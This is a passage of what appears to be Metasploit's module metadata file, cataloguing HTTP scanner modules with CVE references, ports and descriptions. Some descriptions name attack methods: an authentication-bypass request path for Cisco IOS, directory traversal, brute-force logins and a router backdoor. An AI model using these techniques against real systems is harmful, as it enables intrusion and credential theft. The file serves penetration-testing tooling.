"CVE-2018-0296",
"EDB-44956"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-02-28 16:48:54 +0000",
"path": "/modules/auxiliary/scanner/http/cisco_directory_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/cisco_directory_traversal",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/cisco_firepower_download": {
"name": "Cisco Firepower Management Console 6.0 Post Auth Report Download Directory Traversal",
"full_name": "auxiliary/scanner/http/cisco_firepower_download",
"rank": 300,
"disclosure_date": "2016-10-10",
"type": "auxiliary",
"author": [
"Matt",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a directory traversal vulnerability in Cisco Firepower Management\n under the context of www user. Authentication is required to exploit this vulnerability.",
"references": [
"CVE-2016-6435",
"URL-https://blog.korelogic.com/blog/2016/10/10/virtual_appliance_spelunking"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/cisco_firepower_download.rb",
"is_install_path": true,
"ref_name": "scanner/http/cisco_firepower_download",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/cisco_firepower_login": {
"name": "Cisco Firepower Management Console 6.0 Login",
"full_name": "auxiliary/scanner/http/cisco_firepower_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module attempts to authenticate to a Cisco Firepower Management console via HTTPS.\n The credentials are also used for SSH, which could allow remote code execution.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/cisco_firepower_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/cisco_firepower_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/cisco_ios_auth_bypass": {
"name": "Cisco IOS HTTP Unauthorized Administrative Access",
"full_name": "auxiliary/scanner/http/cisco_ios_auth_bypass",
"rank": 300,
"disclosure_date": "2001-06-27",
"type": "auxiliary",
"author": [
"aushack <patrick@osisecurity.com.au>",
"hdm <x@hdm.io>"
],
"description": "This module exploits a vulnerability in the Cisco IOS HTTP Server.\n By sending a GET request for \"/level/num/exec/..\", where num is between\n 16 and 99, it is possible to bypass authentication and obtain full system\n control. IOS 11.3 -> 12.2 are reportedly vulnerable. This module\n tested successfully against a Cisco 1600 Router IOS v11.3(11d).",
"references": [
"BID-2936",
"CVE-2001-0537",
"OSVDB-578"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb",
"is_install_path": true,
"ref_name": "scanner/http/cisco_ios_auth_bypass",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/cisco_ironport_enum": {
"name": "Cisco Ironport Bruteforce Login Utility",
"full_name": "auxiliary/scanner/http/cisco_ironport_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module scans for Cisco Ironport SMA, WSA and ESA web login portals, finds AsyncOS\n versions, and performs login brute force to identify valid credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/cisco_ironport_enum.rb",
"is_install_path": true,
"ref_name": "scanner/http/cisco_ironport_enum",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/cisco_nac_manager_traversal": {
"name": "Cisco Network Access Manager Directory Traversal Vulnerability",
"full_name": "auxiliary/scanner/http/cisco_nac_manager_traversal",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Nenad Stojanovski <nenad.stojanovski@gmail.com>"
],
"description": "This module tests whether a directory traversal vulnerablity is present\n in versions of Cisco Network Access Manager 4.8.x You may wish to change\n FILE (e.g. passwd or hosts), MAXDIRS and RPORT depending on your environment.",
"references": [
"CVE-2011-3305",
"OSVDB-76080"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/cisco_nac_manager_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/cisco_ssl_vpn": {
"name": "Cisco SSL VPN Bruteforce Login Utility",
"full_name": "auxiliary/scanner/http/cisco_ssl_vpn",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jonathan Claudius <jclaudius@trustwave.com>"
],
"description": "This module scans for Cisco SSL VPN web login portals and\n performs login brute force to identify valid credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-11-28 14:30:17 +0000",
"path": "/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb",
"is_install_path": true,
"ref_name": "scanner/http/cisco_ssl_vpn",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/cisco_ssl_vpn_priv_esc": {
"name": "Cisco ASA SSL VPN Privilege Escalation Vulnerability",
"full_name": "auxiliary/scanner/http/cisco_ssl_vpn_priv_esc",
"rank": 300,
"disclosure_date": "2014-04-09",
"type": "auxiliary",
"author": [
"jclaudius <jclaudius@trustwave.com>",
"lguay <laura.r.guay@gmail.com>"
],
"description": "This module exploits a privilege escalation vulnerability for Cisco\n ASA SSL VPN (aka: WebVPN). It allows level 0 users to escalate to\n level 15.",
"references": [
"CVE-2014-2127",
"URL-http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140409-asa",
"URL-https://www3.trustwave.com/spiderlabs/advisories/TWSL2014-005.txt"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb",
"is_install_path": true,
"ref_name": "scanner/http/cisco_ssl_vpn_priv_esc",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/clansphere_traversal": {
"name": "ClanSphere 2011.3 Local File Inclusion Vulnerability",
"full_name": "auxiliary/scanner/http/clansphere_traversal",
"rank": 300,
"disclosure_date": "2012-10-23",
"type": "auxiliary",
"author": [
"blkhtc0rp",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a directory traversal flaw found in Clansphere 2011.3.\n The application fails to handle the cs_lang parameter properly, which can be\n used to read any file outside the virtual directory.",
"references": [
"OSVDB-86720",
"EDB-22181"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/clansphere_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/clansphere_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/cnpilot_r_web_login_loot": {
"name": "Cambium cnPilot r200/r201 Login Scanner and Config Dump",
"full_name": "auxiliary/scanner/http/cnpilot_r_web_login_loot",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module scans for Cambium cnPilot r200/r201 management login\n portal(s), attempts to identify valid credentials, and dump device\n configuration.\n\n The device has at least two (2) users - admin and user. Due to an\n access control vulnerability, it is possible for 'user' account to access full\n device config. All information, including passwords, and keys, is stored\n insecurely, in clear-text form, thus allowing unauthorized admin access to any\n user.",
"references": [
"CVE-2017-5260",
"URL-https://blog.rapid7.com/2017/12/19/r7-2017-25-cambium-epmp-and-cnpilot-multiple-vulnerabilities"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-12-19 16:48:41 +0000",
"path": "/modules/auxiliary/scanner/http/cnpilot_r_web_login_loot.rb",
"is_install_path": true,
"ref_name": "scanner/http/cnpilot_r_web_login_loot",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/coldfusion_locale_traversal": {
"name": "ColdFusion Server Check",
"full_name": "auxiliary/scanner/http/coldfusion_locale_traversal",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"CG <cg@carnal0wnage.com>",
"nebulus"
],
"description": "This module attempts to exploit the directory traversal in the 'locale'\n attribute. According to the advisory the following versions are vulnerable:\n\n ColdFusion MX6 6.1 base patches,\n ColdFusion MX7 7,0,0,91690 base patches,\n ColdFusion MX8 8,0,1,195765 base patches,\n ColdFusion MX8 8,0,1,195765 with Hotfix4.\n\n Adobe released patches for ColdFusion 8.0, 8.0.1, and 9 but ColdFusion 9 is reported\n to have directory traversal protections in place, subsequently this module does NOT\n work against ColdFusion 9. Adobe did not release patches for ColdFusion 6.1 or\n ColdFusion 7.\n\n It is not recommended to set FILE when doing scans across a group of servers where the OS\n may vary; otherwise, the file requested may not make sense for the OS",
"references": [
"CVE-2010-2861",
"BID-42342",
"OSVDB-67047",
"URL-http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861",
"URL-http://www.adobe.com/support/security/bulletins/apsb10-18.html"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/coldfusion_locale_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/coldfusion_version": {
"name": "ColdFusion Version Scanner",
"full_name": "auxiliary/scanner/http/coldfusion_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"nebulus",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module attempts identify various flavors of ColdFusion up to version 10\n as well as the underlying OS.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/coldfusion_version.rb",
"is_install_path": true,
"ref_name": "scanner/http/coldfusion_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/concrete5_member_list": {
"name": "Concrete5 Member List Enumeration",
"full_name": "auxiliary/scanner/http/concrete5_member_list",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Chris John Riley"
],
"description": "This module extracts username information from the Concrete5 member page",
"references": [
"URL-http://blog.c22.cc",
"URL-http://www.concrete5.org",
"URL-http://www.concrete5.org/documentation/using-concrete5/dashboard/users-and-groups/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/concrete5_member_list.rb",
"is_install_path": true,
"ref_name": "scanner/http/concrete5_member_list",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/copy_of_file": {
"name": "HTTP Copy File Scanner",
"full_name": "auxiliary/scanner/http/copy_of_file",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "This module identifies the existence of possible copies\n of a specific file in a given path.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/copy_of_file.rb",
"is_install_path": true,
"ref_name": "scanner/http/copy_of_file",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/crawler": {
"name": "Web Site Crawler",
"full_name": "auxiliary/scanner/http/crawler",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>",
"tasos"
],
"description": "Crawl a web site and store information about what was found",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/crawler.rb",
"is_install_path": true,
"ref_name": "scanner/http/crawler",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/dell_idrac": {
"name": "Dell iDRAC Default Login",
"full_name": "auxiliary/scanner/http/dell_idrac",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Cristiano Maruti <cmaruti@gmail.com>"
],
"description": "This module attempts to login to a iDRAC webserver instance using\n default username and password. Tested against Dell Remote Access\n Controller 6 - Express version 1.50 and 1.85",
"references": [
"CVE-1999-0502"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/dell_idrac.rb",
"is_install_path": true,
"ref_name": "scanner/http/dell_idrac",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/dicoogle_traversal": {
"name": "Dicoogle PACS Web Server Directory Traversal",
"full_name": "auxiliary/scanner/http/dicoogle_traversal",
"rank": 300,
"disclosure_date": "2018-07-11",
"type": "auxiliary",
"author": [
"Carlos Avila",
"h00die"
],
"description": "This module exploits an unauthenticated directory traversal vulnerability\n in the Dicoogle PACS Web Server v2.5.0 and possibly earlier, allowing an\n attacker to read arbitrary files with the web server privileges.\n While the application is java based, the directory traversal was only\n successful against Windows targets.",
"references": [
"EDB-45007"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-08-03 20:23:33 +0000",
"path": "/modules/auxiliary/scanner/http/dicoogle_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/dicoogle_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/dir_listing": {
"name": "HTTP Directory Listing Scanner",
"full_name": "auxiliary/scanner/http/dir_listing",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "This module identifies directory listing vulnerabilities\n in a given directory path.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/dir_listing.rb",
"is_install_path": true,
"ref_name": "scanner/http/dir_listing",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/dir_scanner": {
"name": "HTTP Directory Scanner",
"full_name": "auxiliary/scanner/http/dir_scanner",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "This module identifies the existence of interesting directories\n in a given directory path.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/dir_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/http/dir_scanner",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/dir_webdav_unicode_bypass": {
"name": "MS09-020 IIS6 WebDAV Unicode Auth Bypass Directory Scanner",
"full_name": "auxiliary/scanner/http/dir_webdav_unicode_bypass",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module is based on et's HTTP Directory Scanner module,\n with one exception. Where authentication is required, it attempts\n to bypass authentication using the WebDAV IIS6 Unicode vulnerability\n discovered by Kingcope. The vulnerability appears to be exploitable\n where WebDAV is enabled on the IIS6 server, and any protected folder\n requires either Basic, Digest or NTLM authentication.",
"references": [
"MSB-MS09-020",
"CVE-2009-1535",
"CVE-2009-1122",
"OSVDB-54555",
"BID-34993"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb",
"is_install_path": true,
"ref_name": "scanner/http/dir_webdav_unicode_bypass",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/directadmin_login": {
"name": "DirectAdmin Web Control Panel Login Utility",
"full_name": "auxiliary/scanner/http/directadmin_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Nick Marcoccio \"1oopho1e\" <iremembermodems@gmail.com>"
],
"description": "This module will attempt to authenticate to a DirectAdmin Web Control Panel.",
"references": [
],
"platform": "",
"arch": "",
"rport": 2222,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-12-20 15:09:11 +0000",
"path": "/modules/auxiliary/scanner/http/directadmin_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/directadmin_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/dlink_dir_300_615_http_login": {
"name": "D-Link DIR-300A / DIR-320 / DIR-615D HTTP Login Utility",
"full_name": "auxiliary/scanner/http/dlink_dir_300_615_http_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>",
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "This module attempts to authenticate to different D-Link HTTP management\n services. It has been tested on D-Link DIR-300 Hardware revision A, D-Link DIR-615\n Hardware revision D and D-Link DIR-320 devices. It is possible that this module\n also works with other models.",
"references": [
"CVE-1999-0502"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/dlink_dir_300_615_http_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/dlink_dir_300_615_http_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/dlink_dir_615h_http_login": {
"name": "D-Link DIR-615H HTTP Login Utility",
"full_name": "auxiliary/scanner/http/dlink_dir_615h_http_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>",
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "This module attempts to authenticate to different D-Link HTTP management\n services. It has been tested successfully on D-Link DIR-615 Hardware revision H\n devices. It is possible that this module also works with other models.",
"references": [
"CVE-1999-0502"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/dlink_dir_615h_http_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/dlink_dir_session_cgi_http_login": {
"name": "D-Link DIR-300B / DIR-600B / DIR-815 / DIR-645 HTTP Login Utility",
"full_name": "auxiliary/scanner/http/dlink_dir_session_cgi_http_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>",
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "This module attempts to authenticate to different D-Link HTTP management\n services. It has been tested successfully on D-Link DIR-300 Hardware revision B,\n D-Link DIR-600 Hardware revision B, D-Link DIR-815 Hardware revision A and DIR-645\n Hardware revision A devices. It is possible that this module also works with other\n models.",
"references": [
"CVE-1999-0502"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/dlink_dir_session_cgi_http_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/dlink_user_agent_backdoor": {
"name": "D-Link User-Agent Backdoor Scanner",
"full_name": "auxiliary/scanner/http/dlink_user_agent_backdoor",
"rank": 300,
"disclosure_date": "2013-10-12",
"type": "auxiliary",
"author": [
"Craig Heffner",
"Michael Messner <devnull@s3cur1ty.de>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module attempts to find D-Link devices running Alphanetworks web interfaces affected\n by the backdoor found on the User-Agent header. This module has been tested successfully\n on a DIR-100 device with firmware version v1.13.",
"references": [
"URL-http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/dlink_user_agent_backdoor.rb",
"is_install_path": true,
"ref_name": "scanner/http/dlink_user_agent_backdoor",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/dnalims_file_retrieve": {
"name": "DnaLIMS Directory Traversal",
"full_name": "auxiliary/scanner/http/dnalims_file_retrieve",
"rank": 300,
"disclosure_date": "2017-03-08",
"type": "auxiliary",
"author": [
"h00die <mike@shorebreaksecurity.com>",
"flakey_biscuit <nicholas@shorebreaksecurity.com>"
],
"description": "This module exploits a directory traversal vulnerability found in dnaLIMS.\n Due to the way the viewAppletFsa.cgi script handles the 'secID' parameter, it is possible\n to read a file outside the www directory.",
"references": [
"CVE-2017-6527",
"US-CERT-VU-929263",
"URL-https://www.shorebreaksecurity.com/blog/product-security-advisory-psa0002-dnalims/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/dnalims_file_retrieve.rb",
"is_install_path": true,
"ref_name": "scanner/http/dnalims_file_retrieve",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/docker_version": {
"name": "Docker Server Version Scanner",
"full_name": "auxiliary/scanner/http/docker_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Agora-Security"
],
"description": "This module attempts to identify the version of a Docker Server running on a\n host. If you wish to see all the information available, set VERBOSE to true.",
"references": [
],
"platform": "",
"arch": "",
"rport": 2375,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-07-12 02:56:47 +0000",
"path": "/modules/auxiliary/scanner/http/docker_version.rb",
"is_install_path": true,
"ref_name": "scanner/http/docker_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/dolibarr_login": {
"name": "Dolibarr ERP/CRM Login Utility",
"full_name": "auxiliary/scanner/http/dolibarr_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module attempts to authenticate to a Dolibarr ERP/CRM's admin web interface,\n and should only work against version 3.1.1 or older, because these versions do not\n have any default protections against brute forcing.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/dolibarr_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/dolibarr_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/drupal_views_user_enum": {
"name": "Drupal Views Module Users Enumeration",
"full_name": "auxiliary/scanner/http/drupal_views_user_enum",
"rank": 300,
"disclosure_date": "2010-07-02",
"type": "auxiliary",
"author": [
"Justin Klein Keane",
"Robin Francois <rof@navixia.com>",
"Brandon McCann \"zeknox\" <bmccann@accuvant.com>"
],
"description": "This module exploits an information disclosure vulnerability in the 'Views'\n module of Drupal, brute-forcing the first 10 usernames from 'a' to 'z'",
"references": [
"URL-http://www.madirish.net/node/465"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/drupal_views_user_enum.rb",
"is_install_path": true,
"ref_name": "scanner/http/drupal_views_user_enum",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/ektron_cms400net": {
"name": "Ektron CMS400.NET Default Password Scanner",
"full_name": "auxiliary/scanner/http/ektron_cms400net",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Justin Cacak"
],
"description": "Ektron CMS400.NET is a web content management system based on .NET.\n This module tests for installations that are utilizing default\n passwords set by the vendor. Additionally, it has the ability\n to brute force user accounts. Note that Ektron CMS400.NET, by\n default, enforces account lockouts for regular user account\n after a number of failed attempts.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/ektron_cms400net.rb",
"is_install_path": true,
"ref_name": "scanner/http/ektron_cms400net",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/elasticsearch_traversal": {
"name": "ElasticSearch Snapshot API Directory Traversal",
"full_name": "auxiliary/scanner/http/elasticsearch_traversal",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Benjamin Smith",
"Pedro Andujar <pandujar@segfault.es>",
"Jose A. Guasch <jaguasch@gmail.com>"
],
"description": "'This module exploits a directory traversal vulnerability in\n ElasticSearch, allowing an attacker to read arbitrary files\n with JVM process privileges, through the Snapshot API.'",
"references": [
"CVE-2015-5531",
"PACKETSTORM-132721"
],
"platform": "",
"arch": "",
"rport": 9200,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/elasticsearch_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/elasticsearch_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/enum_wayback": {
"name": "Archive.org Stored Domain URLs",
"full_name": "auxiliary/scanner/http/enum_wayback",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"mubix <mubix@hak5.org>"
],
